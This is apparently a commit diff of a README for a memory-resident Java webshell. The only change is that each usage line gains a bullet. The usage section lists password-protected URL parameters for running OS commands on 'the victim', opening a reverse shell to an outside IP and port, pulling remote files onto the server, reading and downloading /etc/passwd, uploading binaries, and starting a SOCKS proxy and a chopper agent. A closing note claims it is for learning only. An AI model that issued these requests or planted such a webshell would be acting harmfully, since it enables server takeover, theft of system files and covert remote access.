|
2 | 2 | a webshell resides in the memory of java web server |
3 | 3 |
|
4 | 4 | # Usage |
5 | | -anyurl?pwd=pass //show this help page. |
6 | | -anyurl?pwd=pass&model=exec&cmd=whoami //run os command. |
7 | | -anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51. |
8 | | -anyurl?pwd=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly. |
9 | | -anyurl?pwd=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file. |
10 | | -anyurl?pwd=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk. |
11 | | -anyurl?pwd=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk. |
12 | | -anyurl?pwd=pass&model=proxy //start a socks proxy server on the victim. |
13 | | -anyurl?pwd=pass&model=chopper //start a chopper server agent on the victim. |
| 5 | +* anyurl?pwd=pass //show this help page. |
| 6 | +* anyurl?pwd=pass&model=exec&cmd=whoami //run os command. |
| 7 | +* anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51. |
| 8 | +* anyurl?pwd=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly. |
| 9 | +* anyurl?pwd=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file. |
| 10 | +* anyurl?pwd=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk. |
| 11 | +* anyurl?pwd=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk. |
| 12 | +* anyurl?pwd=pass&model=proxy //start a socks proxy server on the victim. |
| 13 | +* anyurl?pwd=pass&model=chopper //start a chopper server agent on the victim. |
14 | 14 |
|
15 | 15 | # note |
16 | 16 | For learning exchanges only, do not use for illegal purposes.by rebeyond. |
0 commit comments